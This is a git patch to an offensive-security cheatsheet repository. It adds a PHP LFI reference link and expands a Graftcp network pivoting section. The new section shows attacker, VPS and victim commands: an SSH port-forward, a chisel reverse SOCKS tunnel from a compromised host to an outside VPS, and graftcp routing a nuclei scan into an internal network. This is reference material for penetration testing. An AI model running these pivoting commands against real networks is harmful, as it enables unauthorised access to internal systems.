From c9ef8f7f4935e789ec2afcfb35e318a2b7b9d206 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 29 Dec 2021 18:16:26 +0100 Subject: [PATCH] Graftcp Cheatsheet --- File Inclusion/README.md | 1 + .../Network Pivoting Techniques.md | 40 +++++++++++++++---- 2 files changed, 34 insertions(+), 7 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index cc4a67f..0e6c0b5 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -433,3 +433,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) * [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1) +* [PHP LFI with Nginx Assistance](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/) \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 670fae3..68a6197 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -82,17 +82,43 @@ socks4 localhost 8080 Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6` -## Graphtcp +## Graftcp -Same as proxychains, with another mechanism to "proxify" which allow Go applications. +> A flexible tool for redirecting a given program's TCP traffic to SOCKS5 or HTTP proxy. -```powershell -git clone https://github.com/hmgle/graftcp.git -cd graftcp && make -graftcp-local/graftcp-local -./graftcp chromium-browser +:warning: Same as proxychains, with another mechanism to "proxify" which allow Go applications. + +```ps1 +# https://github.com/hmgle/graftcp + +# Create a SOCKS5, using Chisel or another tool and forward it through SSH +(attacker) $ ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS +(vps) $ ./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse +(victim 1) $ ./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks + +# Run graftcp and specify the SOCKS5 +(attacker) $ graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080 +(attacker) $ graftcp ./nuclei -u http://172.16.1.24 ``` +Simple configuration file for graftcp + +```py +# https://github.com/hmgle/graftcp/blob/master/local/example-graftcp-local.conf +## Listen address (default ":2233") +listen = :2233 +loglevel = 1 + +## SOCKS5 address (default "127.0.0.1:1080") +socks5 = 127.0.0.1:1080 +# socks5_username = SOCKS5USERNAME +# socks5_password = SOCKS5PASSWORD + +## Set the mode for select a proxy (default "auto") +select_proxy_mode = auto +``` + + ## Web SOCKS - reGeorg [reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.